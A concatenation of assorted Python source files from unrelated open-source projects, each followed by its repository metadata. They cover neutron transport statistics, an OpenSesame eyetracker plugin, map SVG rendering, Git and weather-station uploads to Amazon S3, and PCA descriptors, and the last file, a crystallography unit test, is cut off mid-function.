#Get abs rate in right half
abs_report[ 0 , 1 ] = sum( abs_array , h_index + 1 )
logging.debug( 'Absorption half cell array: ' )
logging.debug( str( abs_report[ 0 ] ) )
logging.debug( 'Total absorption is: ' + \
str( total_abs ) )
#Store error
abs_report[ 1 , 0 ] = abs_e_l
abs_report[ 1 , 1 ] = abs_e_r
#Get abs prob
abs_report[ 2 ] = abs_report[ 0 ] / float( num_part )
logging.debug( 'Abs probability half cell array:' )
logging.debug( str( abs_report[ 1 ] ) )
#Store error for prob
abs_report[ 3 ] = abs_report[ 1 ] / float( num_part )
logging.debug( 'Leaving the abs_half_cell function' )
sep()
return( abs_report )
#This function will calculate our leakage prob
def currents( l_array , num_part ):
'''This function will produce leakage prob'''
sep()
logging.debug( 'Entering the currents function' )
#Init array
cur_report = np.zeros( ( 3 , 2 ) )
#Calc leak error
cur_report[ 0 ] = np.sqrt( np.square( l_array - l_array / \
float( num_part ) ) / ( float( num_part - 1 ) ) )
#Generate leakage probabilities
cur_report[ 1 , 0 ] = l_array[ 0 ] / float( num_part )
cur_report[ 1 , 1 ] = l_array[ 1 ] / float( num_part )
#Gen leak prob error
cur_report[ 2 ] = cur_report[ 0 ] / float( num_part )
logging.debug( 'Leaving the currents function' )
sep()
return( cur_report )
#This function will plot our flux
def plotter( flux , num_part , num_bins , width , cep , sep ):
'''This function will plot our flux'''
sep()
logging.debug( 'Entering plotting function' )
logging.debug( 'First bins' )
points = [ x * width for x in range( num_bins + 1 ) ]
logging.debug( str( points ) )
cep()
logging.debug( 'Second bins' )
bins = [ x for pair in zip( points , points ) for x in pair][1:-1]
logging.debug( str( bins ) )
mid_points = points[ 0 : len( points ) - 1 ]
mid_points = [ x + ( width / 2.0 ) for x in mid_points ]
cep()
logging.debug( 'mid_points array: ' )
logging.debug( str( mid_points ) )
cep()
logging.debug( 'Phi' )
cep()
phi = [ x for pair in zip( flux[ 0 ] , flux[ 0 ] ) for x in pair ]
phi_err = flux[ 1 ]
logging.debug( str( phi ) )
logging.debug( str( len( mid_points ) ) )
logging.debug( str( len( phi_err ) ) )
label_string = 'N = ' + str( num_part )
save_string = 'P3Plot' + str( num_part )
pl.plot( bins , phi , 'b-' , label = label_string )
pl.plot( mid_points , flux[ 0 ] , marker = '.' , color = 'b' , \
visible = False )
pl.errorbar( mid_points , flux[ 0 ] , yerr = phi_err , linestyle = 'None' )
pl.xlabel( 'Position in cm' )
pl.ylabel( 'Normalized Flux (#/s*cm*cm)' )
pl.title( 'Scalar Flux Distribution' )
pl.savefig( save_string )
logging.debug( 'Leaving the plotting function' )
sep()
return
#Lets begin our neutron histories loop
albedo = 0
for i in range( N ):
albedo += Lifetime( collisions , absorptions , leak_array , xs , \
cell_length , start_pos , angle , \
distance , leakage , collide , col_type , \
location , new_angle , att_array , cep , sep )
#Now we generate the flux
#Phi = flux_collision( collisions , absorptions , N , cell_length, \
# h , sig_array, cep , sep )
#Now we plot the flux
#plotter( Phi , N , h , cell_length , cep , sep )
#Now we generate the absorption information
abs_out = abs_half_cells( absorptions , N , cep , sep )
#Now we generate our leakage probabilities
leak_prob = currents( leak_array , N )
#We also print to the log file
sep()
logging.critical( 'The number of particles used is: ' + str( N ) )
cep()
logging.critical( 'The abs rate is: ' + str( abs_out[ 0 ] ) )
logging.critical( 'The abs rate error is: ' + str( abs_out[ 1 ] ) )
logging.critical( 'The abs prob is: ' + str( abs_out[ 2 ] ) )
logging.critical( 'The abs prob error is: ' + str( abs_out[ 3 ] ) )
cep()
logging.critical( 'The leakage rate is: ' + str( leak_array ) )
logging.critical( 'The error in leak rate is: ' + str( leak_prob[ 0 ] ) )
logging.critical( 'The leak prob is: ' + str( leak_prob[ 1 ] ) )
logging.critical( 'The leak prob error is: ' + str( leak_prob[ 2 ] ) )
cep()
logging.critical( 'The albedo number is: ' + str( albedo ) )
logging.critical( 'The albedo ratio is: ' +str( albedo * 0.5 / float( N ) ) )
albedo_error = math.sqrt( ( albedo - ( albedo * 0.5 / float( N ) ) )**2 \
/ ( float( N - 1 ) ) )
logging.critical( 'The albedo ratio error is: ' + str( albedo_error ) )
# Let the user know it has all ended
print "Sn CODE END!!"
print "*************************************************************"
|
ddwooten/NE255
|
HW4/4.py
|
Python
|
gpl-2.0
| 26,177
|
# Definition for singly-linked list.
# class ListNode(object):
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution(object):
def removeElements(self, head, val):
"""
:type head: ListNode
:type val: int
:rtype: ListNode
"""
node = ListNode(None)
node.next = head
p = node
while p.next:
if p.next.val != val:
p = p.next
else:
p.next = p.next.next
return node.next
|
xinqiu/My-LeetCode-Notes
|
Leetcode/203.py
|
Python
|
gpl-2.0
| 543
|
"""
This file is part of OpenSesame.
OpenSesame is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
OpenSesame is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with OpenSesame. If not, see <http://www.gnu.org/licenses/>.
"""
from libopensesame import item, exceptions
from libqtopensesame import qtplugin
import openexp.canvas
import os.path
import imp
from PyQt4 import QtGui, QtCore
class eyetracker_drift_correct(item.item):
"""
This class (the class with the same name as the module)
handles the basic functionality of the item. It does
not deal with GUI stuff.
"""
def __init__(self, name, experiment, string = None):
"""
Constructor
"""
# The item_typeshould match the name of the module
self.item_type = "eyetracker_drift_correct"
self._mode_manual = "Manual (spacebar triggered)"
self._mode_auto = "Automatic (fixation triggered)"
self.mode = self._mode_manual
self.xpos = 0
self.ypos = 0
# Provide a short accurate description of the items functionality
self.description = "Drift correction plugin (part of the eyetracker plug-ins)"
# The parent handles the rest of the contruction
item.item.__init__(self, name, experiment, string)
def prepare(self):
"""
Prepare the item.
"""
# Pass the word on to the parent
item.item.prepare(self)
# check if an eyetracker instance exists
if not hasattr(self.experiment, "eyetracker"):
raise exceptions.runtime_error("Please connect to the eyetracker using the the eyetracker_calibrate plugin before using any other eyetracker plugins")
# Report success
return True
def run(self):
"""
Run the item.
"""
self.set_item_onset()
try:
x = int(self.get("xpos", _eval=True))
y = int(self.get("ypos", _eval=True))
except:
raise exceptions.runtime_error("Please use numeric values for the coordinates in eyetracker_drift_correct item '%s'" % self.name)
if not self.has("coordinates") or self.get("coordinates") == "relative":
x += self.get("width") / 2
y += self.get("height") / 2
# Draw a fixation cross
c = openexp.canvas.canvas(self.experiment, self.get("background"), self.get("foreground"))
c.set_penwidth(3)
c.line(x - 5, y, x + 5, y)
c.line(x, y - 5, x, y + 5)
c.show()
# Do drift correction
while not self.experiment.eyetracker.drift_correction( (x, y), \
self.get("mode") == self._mode_auto):
self.experiment.eyetracker.calibrate()
c.show()
# Report success
return True
class qteyetracker_drift_correct(eyetracker_drift_correct, qtplugin.qtplugin):
"""
This class (the class named qt[name of module] handles
the GUI part of the plugin. For more information about
GUI programming using PyQt4, see:
<http://www.riverbankcomputing.co.uk/static/Docs/PyQt4/html/classes.html>
"""
def __init__(self, name, experiment, string = None):
"""
Constructor
"""
# Pass the word on to the parents
eyetracker_drift_correct.__init__(self, name, experiment, string)
qtplugin.qtplugin.__init__(self, __file__)
def init_edit_widget(self):
"""
This function creates the controls for the edit
widget.
"""
# Lock the widget until we're doing creating it
self.lock = True
# Pass the word on to the parent
qtplugin.qtplugin.init_edit_widget(self, False)
self.add_combobox_control("mode", "Mode", [self._mode_manual, self._mode_auto], tooltip = "Indicates if drift correction should be manual or automatic")
if self.has("coordinates") and self.get("coordinates") == "absolute":
self.add_line_edit_control("xpos", "X coordinate", self.get("width") / 2)
self.add_line_edit_control("ypos", "Y coordinate", self.get("height") / 2)
else:
self.add_line_edit_control("xpos", "X coordinate", 0)
self.add_line_edit_control("ypos", "Y coordinate", 0)
# Add a stretch to the edit_vbox, so that the controls do not
# stretch to the bottom of the window.
self.edit_vbox.addStretch()
# Unlock
self.lock = True
def apply_edit_changes(self):
"""
Set the variables based on the controls
"""
# Abort if the parent reports failure of if the controls are locked
if not qtplugin.qtplugin.apply_edit_changes(self, False) or self.lock:
return False
# Refresh the main window, so that changes become visible everywhere
self.experiment.main_window.refresh(self.name)
# Report success
return True
def edit_widget(self):
"""
Set the controls based on the variables
"""
# Lock the controls, otherwise a recursive loop might aris
# in which updating the controls causes the variables to be
# updated, which causes the controls to be updated, etc...
self.lock = True
# Let the parent handle everything
qtplugin.qtplugin.edit_widget(self)
# Unlock
self.lock = False
# Return the _edit_widget
return self._edit_widget
|
esdalmaijer/opensesame_eyetracker
|
eyetracker_drift_correct/eyetracker_drift_correct.py
|
Python
|
gpl-2.0
| 5,207
|
#!/usr/bin/env python
# Use this script instead of running lupdate directly in order to prune some
# phrases from the Qt translation files that lupdate insists on adding to the
# PortaBase translation files (because they're used directly in the code).
from os import listdir, system
from os.path import join
import re
system('lupdate portabase.pro')
pattern = re.compile(r'<context>\s*<name>QFileSystemModel((?!</context>).)+</context>\s*', re.S)
dir = join('resources', 'translations')
for path in listdir(dir):
if not path[:4] == 'port' or not path[-3:] == '.ts':
continue
file = open(join(dir, path), 'r')
content = ''.join(file.readlines())
file.close()
content = pattern.sub('', content)
file = open(join(dir, path), 'w')
file.write(content)
file.close()
|
jmbowman/portabase
|
packaging/update_translations.py
|
Python
|
gpl-2.0
| 803
|
import os
import sys
from PyQt5.QtQuick import QQuickView
# to make sure cxFreeze includes it
from fsbc.application import app
from fsui.qt import QUrl
class GameCenterView(QQuickView):
def __init__(self, parent=None):
QQuickView.__init__(self, parent)
if getattr(sys, "frozen", ""):
qml_path = os.path.join(app.executable_dir(), "qml")
else:
qml_path = os.path.expanduser("~/git/fs-uae/fs-uae-launcher/qml")
engine = self.engine()
print(engine.importPathList())
print(engine.pluginPathList())
# engine.setPluginPathList([qml_path, "."])
# engine.addPluginPath(qml_path)
# engine.addImportPath(qml_path)
# engine.setPluginPathList([qml_path, "."])
# engine.setImportPathList([qml_path])
# engine.addPluginPath(qml_path)
# print("setImportPathList", [QUrl.fromLocalFile(qml_path)])
self.setSource(
QUrl.fromLocalFile(
os.path.join(qml_path, "ScaledUserInterface.qml")
)
)
# self.game_center_view = GameCenterView()
self.engine().quit.connect(self.on_quit)
self.resize(960, 540)
# self.game_center_widget = QWidget.createWindowContainer(
# self.game_center_view, parent=self)
# self.resize(960, 540)
# self.game_center_widget.setFocus()
# self.game_center_widget.setFocusPolicy(Qt.TabFocus)
# self.game_center_view.requestActivate()
# self.setFocus()
def on_quit(self):
self.close()
|
FrodeSolheim/fs-uae-launcher
|
fsgamesys/ui/qwindow.py
|
Python
|
gpl-2.0
| 1,580
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
#
# Copyright 2014 faisal oead <fafagold@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
import sys
import arabic_reshaper
def main():
reshaped_text = arabic_reshaper.reshape(sys.argv[1].decode('utf-8'))
print reshaped_text.encode('utf-8')
if __name__ == '__main__':
main()
|
faisal-oead/conky-arabic-support
|
conkyar/rtl.py
|
Python
|
gpl-2.0
| 1,028
|
# encoding=utf-8
# pykarta/maps/layers/osm_svg.py
# Copyright 2013--2018, Trinity College
# Last modified: 22 October 2018
import os
import math
import re
#import gzip
from pykarta.maps.layers.base import MapLayer
from pykarta.misc.http import simple_urlopen
from pykarta.misc import file_age_in_days, SaveAtomically
#try:
# import rsvg
#except:
import pykarta.fallback.rsvg as rsvg
#=============================================================================
# Experimental layer which exports a map in SVG format from openstreetmap.org
# This is intended for printing.
#=============================================================================
class MapLayerSVG(MapLayer):
url_template = "https://render.openstreetmap.org/cgi-bin/export?bbox=%f,%f,%f,%f&scale=%d&format=svg"
xlate = {
# Brown Buildings
"fill:rgb(74.72549%,66.27451%,66.27451%)": "fill:rgb(0%,100%,0%)",
# Blue outline of highway=motorway
"stroke:rgb(46.666667%,53.333333%,63.137255%)": "stroke:rgb(0%,0%,0%)",
# Blue center highway=motorway
"stroke:rgb(53.72549%,64.313725%,79.607843%)": "stroke:rgb(0%,0%,100%)",
# Reddish outline of highway=primary
"stroke:rgb(77.254902%,48.235294%,49.411765%)": "stroke:rgb(0%,0%,0%)",
# Reddish center of highway=primary
"stroke:rgb(86.666667%,62.352941%,62.352941%)": "stroke:rgb(90%,50%,50%)",
# Orange outline of highway=secondary
"stroke:rgb(80%,63.137255%,41.568627%)": "stroke:rgb(0%,0%,0%)",
# Orange center of highway=secondary
"stroke:rgb(97.647059%,83.921569%,66.666667%)": "stroke:rgb(100%,70%,50%)",
# Outline of highway=tertiary
"stroke:rgb(77.647059%,77.647059%,54.117647%)": "stroke:rgb(0%,0%,0%)",
# Pale yellow center of highway=tertiary
"stroke:rgb(97.254902%,97.254902%,72.941176%)": "stroke:rgb(100%,100%,70%)",
# White center of highway=residential, also white of holos
#"stroke:rgb(100%,100%,100%)": "stroke:rgb(100%,0%,0%)",
# Gray border of highway=residential
"stroke:rgb(73.333333%,73.333333%,73.333333%)": "stroke:rgb(0%,0%,0%)",
}
def __init__(self, source, extra_zoom=1.0):
if source != "osm-default-svg":
raise ValueError
MapLayer.__init__(self)
self.source = source
self.extra_zoom = extra_zoom
self.attribution = u"Map © OpenStreetMap contributors"
self.svg = None
self.svg_scale = None
self.rgb_pattern = re.compile(r"(fill|stroke):rgb\([0-9\.]+%,[0-9\.]+%,[0-9\.]+%\)")
def set_map(self, containing_map):
MapLayer.set_map(self, containing_map)
self.cache_dir = os.path.join(self.containing_map.tile_cache_basedir, self.source)
if not os.path.exists(self.cache_dir):
os.makedirs(self.cache_dir)
def do_viewport(self):
print "SVG layer: new viewport"
bbox = self.containing_map.get_bbox()
zoom = self.containing_map.get_zoom()
# What a reading of http://svn.openstreetmap.org/applications/rendering/mapnik/zoom-to-scale.txt suggests:
#scale = int(559082264.028 / math.pow(2, zoom) / self.extra_zoom + 0.5)
# Determined by trial and error, produces map with expected pixel size
scale = int(698000000 / math.pow(2, zoom) / self.extra_zoom + 0.5)
print "SVG layer: scale:", scale
cachefile = os.path.join(self.cache_dir, "%f_%f_%f_%f_%d.svg" % (bbox.min_lon, bbox.min_lat, bbox.max_lon, bbox.max_lat, scale))
cachefile_age = file_age_in_days(cachefile)
# Download the SVG file if we do not have it already in the cache.
if cachefile_age is None or cachefile_age > 30:
self.feedback.progress(0, 2, _("Requesting SVG file"))
# FIXME: gzip compression not supported
# See: http://love-python.blogspot.com/2008/07/accept-encoding-gzip-to-make-your.html?m=1
url = self.url_template % (bbox.min_lon, bbox.min_lat, bbox.max_lon, bbox.max_lat, scale)
response = simple_urlopen(url, extra_headers={'Cookie':'_osm_totp_token=384781'})
content_type = response.getheader("content-type")
if content_type != "image/svg+xml":
raise AssertionError("Unsupported content-type: %s" % content_type)
content_length = int(response.getheader("content-length"))
print "content-length:", content_length
content_encoding = response.getheader("content-encoding")
#if content_encoding != "gzip":
# raise AssertionError("Unsupported content-encoding: %s" % content_encoding)
fh = SaveAtomically(cachefile)
count = 0
while True:
self.containing_map.feedback.progress(float(count) / float(content_length), 2, _("Downloading SVG file"))
data = response.read(0x10000)
if data == "":
break
fh.write(data)
count += len(data)
fh.close()
# Load the SVG file into memory.
self.svg = rsvg.Handle()
#ifh = gzip.GzipFile(cachefile, "r")
ifh = open(cachefile, "r")
for line in ifh:
# remove background color
if line.startswith("<rect"):
continue
# Alter colors
line = self.rgb_pattern.sub(lambda m: self.xlate.get(m.group(0),m.group(0)), line)
self.svg.write(line) # FIXME: error checking is missing
if not self.svg.close():
raise AssertionError("Failed to load SVG file: %s" % cachefile)
print "SVG layer: map dimensions:", self.containing_map.width, self.containing_map.height
width, height = self.svg.get_dimension_data()[:2]
print "SVG layer: SVG image dimensions:", width, height
self.svg_scale = float(self.containing_map.width) / float(width)
print "SVG layer: svg_scale:", self.svg_scale
print "done"
def do_draw(self, ctx):
print "draw"
self.containing_map.feedback.progress(1, 2, _("Rendering SVG file"))
ctx.scale(self.svg_scale, self.svg_scale)
self.svg.render_cairo(ctx)
|
david672orford/pykarta
|
pykarta/maps/layers/osm_svg.py
|
Python
|
gpl-2.0
| 5,567
|
import unittest
from nose.tools import assert_equals
from dojo.taxonomy.maps import RefseqAssemblyMap
class RefseqAssemblyMapTest(unittest.TestCase):
def test(self):
refseq_map = RefseqAssemblyMap()
assert_equals(None, None)
|
knights-lab/NINJA-DOJO
|
dojo/tests/test_refseq_assembly_map.py
|
Python
|
gpl-2.0
| 248
|
# Copyright (C) 2009 Abdelhalim Ragab <abdelhalim@gmail.com>
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; version 3
# of the License or (at your option) any later version of
# the License.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
Created on Jul 10, 2009
@author: abdelhalim
'''
from local_repo import Gits3
from git_config import GitConfig
from amazon_s3_transport import S3Transport
import os
import sys
import getopt
def usage():
print 'Usage: gits3 push <remote> <refs>'
def get_root():
# get current directory
root = os.getcwd()
# check to see if the current folder is Git repo
git_dir = os.path.join(root, ".git")
if not os.path.exists(git_dir):
print "Should run in git repo"
sys.exit(2)
return root
def main(argv):
# parse the arguments
try:
opts, args = getopt.getopt(argv, 'h')
except getopt.GetoptError, err:
# print help information and exit:
print str(err) # will print something like "option -a not recognized"
usage()
sys.exit(2)
if len(args) < 3:
usage()
sys.exit(2)
if args[0] != 'push':
usage()
sys.exit(2)
refs = args[2]
print 'Local Refs: ',refs
root = get_root()
cfg = GitConfig(root)
url = cfg.get_remote_url()
fetch = cfg.get_fetch()
transport = S3Transport(url)
advertised_refs = transport.get_advertised_refs()
if len(advertised_refs) == 0:
transport.create_new_repo(refs)
client = Gits3(root)
tracking_ref = client.find_tracking_ref_names(fetch, refs)
updated_objects = client.get_updates(refs, tracking_ref)
if updated_objects == None:
print 'Up to date'
else:
base = client.generate_pack_name(updated_objects)
client.write_pack(base, updated_objects)
pack_name = 'pack-' + base + '.pack'
transport.upload_pack(pack_name)
transport.upload_pack('pack-' + base + '.idx')
packs = transport.get_pack_names()
packs_str = 'P ' + pack_name + '\n'
for pack in packs:
packs_str = packs_str + 'P ' + pack + '\n'
print packs_str
transport.upload_string('objects/info/packs', packs_str)
transport.upload_string(refs, client.get_id(refs))
transport.upload_string('info/refs', client.get_id(refs) + '\t' + refs + '\n')
# update local tracking refs
pass
if __name__ == '__main__':
main(sys.argv[1:])
|
abdelhalim/gits3
|
src/gits3/gits3.py
|
Python
|
gpl-2.0
| 3,102
|
#!/usr/bin/env python
"""
author: Guillaume Bouvier
email: guillaume.bouvier@ens-cachan.org
creation date: 01 10 2013
license: GNU GPL
Please feel free to use and modify this, but keep the above information.
Thanks!
"""
import IO
import numpy
import itertools
import scipy.spatial
import scipy.stats
import scipy.ndimage.measurements
import SOM
import glob
#from newProtocolModule import *
from SOMTools import *
import cPickle
import os
import ConfigParser
import sys
import PCA
from multiprocessing import Pool
configFileName = sys.argv[1]
Config = ConfigParser.ConfigParser()
Config.read(configFileName)
nframe = Config.getint('makeVectors', 'nframes')
structFile = Config.get('makeVectors', 'structFile')
trajFile = Config.get('makeVectors', 'trajFile')
projection = Config.getboolean('makeVectors', 'projection')
nProcess = Config.getint('makeVectors', 'nProcess')
pool = Pool(processes=nProcess)
ref = True
descriptorsList = []
eigenVectorsList = []
eigenValuesList = []
meansList = []
struct = IO.Structure(structFile)
mask = numpy.ones((struct.atoms.shape[0]),dtype="bool")
traj = IO.Trajectory(trajFile, struct, selectionmask=mask, nframe=nframe)
trajIndex = 0
while trajIndex < nframe:
distMats = []
proc = 0
while proc < nProcess and trajIndex < nframe:
sys.stdout.write('%s/%s'%(trajIndex+1,nframe))
sys.stdout.write('\r')
sys.stdout.flush()
traj_i = traj.array[trajIndex]
shapeTraj = traj_i.reshape(traj.natom,3)
dist = scipy.spatial.distance.pdist(shapeTraj)
distMat = scipy.spatial.distance.squareform(dist)**2
mean = numpy.mean(distMat,axis=1)
meansList.append(mean)
distMats.append(distMat)
proc += 1
trajIndex += 1
eigenVectors_eigenValues = pool.map(PCA.princomp, distMats)
eigenVectorsPool = [e[0] for e in eigenVectors_eigenValues]
eigenValuesPool = [e[1] for e in eigenVectors_eigenValues]
for eigenValues in eigenValuesPool:
eigenValuesList.append(eigenValues)
for eigenVectors in eigenVectorsPool:
if ref:
eigenVectors_ref = eigenVectors
ref = False
eigenVectors = eigenVectors*numpy.sign(numpy.dot(eigenVectors.T,eigenVectors_ref).diagonal())
eigenVectorsList.append(eigenVectors.flatten())
if projection:
descriptor = numpy.dot(eigenVectors.T,distMat).flatten()
else:
descriptor = eigenVectors.T.flatten()
descriptorsList.append(descriptor)
projections = numpy.asarray(descriptorsList)
numpy.save('projections.npy', projections)
eigenVectorsList = numpy.asarray(eigenVectorsList)
numpy.save('eigenVectorsList', eigenVectorsList)
eigenValuesList = numpy.asarray(eigenValuesList)
numpy.save('eigenValues', eigenValuesList)
meansList = numpy.asarray(meansList)
numpy.save('meansList', meansList)
reconstruction = numpy.concatenate((eigenVectorsList,projections,meansList),axis=1)
numpy.save('reconstruction',reconstruction)
|
bougui505/SOM
|
application/makeVectorsFromdcd_PCA.py
|
Python
|
gpl-2.0
| 2,822
|
#
# Copyright (c) 2015-2020 Bill Madill <wm@wmadill.com>
# Derivative of extensions/alarm.py, credit to Tom Keffer <tkeffer@gmail.com>
#
# See the file LICENSE.txt for your full rights.
#
"""Upload the generated HTML files to an S3 bucket
********************************************************************************
To use this uploader, add the following to your configuration file in the
[StdReport] section:
[[S3upload]]
skin = S3upload
bucket_name = "BUCKETNAME"
In the weewx home directory, create a file named ".s3cfg" if it doesn't
already exist and set the "access_key" and "secret_key" values for the
IAM user that runs s3cmd. Refer to the s3cmd man page for details.
Set the ".s3cfg" file permissions to 0600 but DO NOT CHECK IT INTO a pulbic
git repository.
********************************************************************************
"""
import errno
import glob
import os.path
import re
import subprocess
import sys
import threading
import time
import traceback
import configobj
from weeutil.weeutil import timestamp_to_string, option_as_list
import weewx
# Inherit from the base class ReportGenerator
class S3uploadGenerator(weewx.reportengine.ReportGenerator):
"""Custom service to upload files to an S3 bucket"""
# Set up logging for both weewx 3 and weewx 4 from tkeffer's blog
# post.
# This syntax is really dorky--there must be a better way without
# having all the "self." on names. But this works as offensive
# as it is....
try:
# Test for new-style weewx logging by trying to import weeutil.logger
import weeutil.logger
import logging
log = logging.getLogger(__name__)
def logdbg(self, msg):
self.log.debug(msg)
def loginf(self, msg):
self.log.info(msg)
def logerr(self, msg):
self.log.error(msg)
except ImportError:
# Old-style weewx logging
import syslog
def logmsg(self, level, msg):
self.syslog.syslog(level, 's3uploadgenerator: %s:' % msg)
def logdbg(self, msg):
self.logmsg(self.syslog.LOG_DEBUG, msg)
def loginf(self, msg):
self.logmsg(self.syslog.LOG_INFO, msg)
def logerr(self, msg):
self.logmsg(self.syslog.LOG_ERR, msg)
def run(self):
self.logdbg("""s3uploadgenerator: start S3uploadGenerator""")
self.logdbg("s3uploadgenerator: python version: " + sys.version)
# Get the options from the configuration dictionary and credential file.
# Raise an exception if a required option is missing.
try:
html_root = self.config_dict['StdReport']['HTML_ROOT']
self.local_root = os.path.join(self.config_dict['WEEWX_ROOT'], html_root) + "/"
self.bucket_name = self.skin_dict['bucket_name']
self.logdbg("s3uploadgenerator: upload configured from '%s' to '%s'" % (self.local_root, self.bucket_name))
except KeyError as e:
self.loginf("s3uploadgenerator: no upload configured. %s" % e)
exit(1)
# Get full path to "s3cmd"; exit if not installed
path_proc = subprocess.Popen(["which", "s3cmd"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
self.s3cmd_path = path_proc.communicate()[0].decode().strip()
# 'which' returns an empty string if "s3cmd" not in $PATH
if self.s3cmd_path == '':
self.loginf("s3uploadgenerator: 's3cmd' cannot be found")
exit(1)
self.logdbg("s3uploadgenerator: s3cmd location: " + self.s3cmd_path)
self.logdbg("s3uploadgenerator: uploading")
# Launch in a separate thread so it doesn't block the main LOOP thread:
t = threading.Thread(target=self.uploadFiles)
t.start()
self.logdbg("s3uploadgenerator: return from upload thread")
def uploadFiles(self):
start_ts = time.time()
t_str = timestamp_to_string(start_ts)
self.logdbg("s3uploadgenerator: start upload at %s" % t_str)
# Build s3cmd command string
cmd = [self.s3cmd_path]
cmd.extend(["sync"])
cmd.extend(["--config=/home/weewx/.s3cfg"])
cmd.extend([self.local_root])
cmd.extend(["s3://%s" % self.bucket_name])
self.logdbg("s3uploadgenerator: command: %s" % cmd)
try:
S3upload_cmd = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
stdout = S3upload_cmd.communicate()[0]
stroutput = stdout.strip()
except OSError as e:
if e.errno == errno.ENOENT:
self.logerr("s3uploadgenerator: s3cmd does not appear to be installed on this system. (errno %d, \"%s\")" % (e.errno, e.strerror))
raise
if weewx.debug == 1:
self.logdbg("s3uploadgenerator: s3cmd output: %s" % stroutput)
for line in iter(stroutput.splitlines()):
self.logdbg("s3uploadgenerator: s3cmd output: %s" % line)
# S3upload output. generate an appropriate message
if stroutput.find(b'Done. Uploaded ') >= 0:
file_cnt = 0
for line in iter(stroutput.splitlines()):
# Not sure what a specific upload failure looks like.
# This is what s3cmd version 1.6.1 returns on successful upload.
# Note that this is from the Debian repos and is ooolllldddd
if line.find(b'upload: ') >= 0:
file_cnt += 1
if line.find(b'Done. Uploaded ') >= 0:
# get number of bytes uploaded
m = re.search(r"Uploaded (\d*) bytes", str(line))
if m:
byte_cnt = int(m.group(1))
else:
byte_cnt = "Unknown"
# format message
try:
if file_cnt is not None and byte_cnt is not None:
S3upload_message = "uploaded %d files (%s bytes) in %%0.2f seconds" % (int(file_cnt), byte_cnt)
else:
S3upload_message = "executed in %0.2f seconds"
except:
S3upload_message = "executed in %0.2f seconds"
else:
# suspect we have an s3cmd error so display a message
self.loginf("s3uploadgenerator: s3cmd reported errors")
for line in iter(stroutput.splitlines()):
self.loginf("s3uploadgenerator: s3cmd error: %s" % line)
S3upload_message = "executed in %0.2f seconds"
stop_ts = time.time()
self.loginf("s3uploadgenerator: results: " + S3upload_message % (stop_ts - start_ts))
t_str = timestamp_to_string(stop_ts)
self.logdbg("s3uploadgenerator: end upload at %s" % t_str)
if __name__ == '__main__':
"""This section is used for testing the code. """
exit(0)
# Note that this fails!
import sys
import configobj
from optparse import OptionParser
usage_string ="""Usage:
S3upload.py config_path
Arguments:
config_path: Path to weewx.conf"""
parser = OptionParser(usage=usage_string)
(options, args) = parser.parse_args()
if len(args) < 1:
sys.stderr.write("Missing argument(s).\n")
sys.stderr.write(parser.parse_args(["--help"]))
exit()
config_path = args[0]
weewx.debug = 1
try :
config_dict = configobj.ConfigObj(config_path, file_error=True)
except IOError:
print ("Unable to open configuration file ", config_path)
exit()
if 'S3upload' not in config_dict:
print >>sys.stderr, "No [S3upload] section in the configuration file %s" % config_path
exit(1)
engine = None
S3upload = uploadFiles(engine, config_dict)
rec = {'extraTemp1': 1.0,
'outTemp' : 38.2,
'dateTime' : int(time.time())}
event = weewx.Event(weewx.NEW_ARCHIVE_RECORD, record=rec)
S3upload.newArchiveRecord(event)
|
wmadill/weewx-S3upload
|
bin/user/S3upload.py
|
Python
|
gpl-2.0
| 8,164
|
from __future__ import print_function
from ImageD11.indexing import ubi_fit_2pks
from ImageD11.unitcell import unitcell
import numpy as np
import time
import unittest, cProfile, pstats
def make_random_orientations( N ):
"""
Generate random quaternions and convert to U matrices
"""
q = np.random.standard_normal( (4, N) )
s = 1/(q*q).sum( axis=0 )
U = np.zeros( (N, 3, 3), float )
r,i,j,k = 0,1,2,3
U[:,0,0] = 1 - 2*s*(q[j]*q[j]+q[k]*q[k])
U[:,0,1] = 2*s*(q[i]*q[j]-q[k]*q[r])
U[:,0,2] = 2*s*(q[i]*q[k]+q[j]*q[r])
U[:,1,0] = 2*s*(q[i]*q[j]+q[k]*q[r])
U[:,1,1] = 1 - 2*s*(q[i]*q[i]+q[k]*q[k])
U[:,1,2] = 2*s*(q[j]*q[k]-q[i]*q[r])
U[:,2,0] = 2*s*(q[i]*q[k]-q[j]*q[r])
U[:,2,1] = 2*s*(q[j]*q[k]+q[i]*q[r])
U[:,2,2] = 1 - 2*s*(q[i]*q[i]+q[j]*q[j])
return U
class test_2pks( unittest.TestCase ):
def setUp(self):
self.a = 6
self.c = 5
self.U = make_random_orientations( 1 )[0]
def test_tetragonal(self):
a,c = self.a, self.c
cell = unitcell( [ a*1.05, a*1.05, c*0.95, 90., 90.,90.], "P" )
ub = np.dot( self.U, cell.B )
h1 = (1,0,0)
h2 = (0,0,1)
g1 = np.dot( ub, h1 ) # a calc, wrong
g2 = np.dot( ub, h2 ) # c
ideal = unitcell( [ a, a, c, 90., 90.,90.], "P" )
ideal.makerings(0.3)
ideal.orient( 0, g1, 1, g2 )
gve = np.vstack( (g1 , g2) ).T
for ubi in ideal.UBIlist:
ufit = ubi_fit_2pks( ubi, g1, g2 )
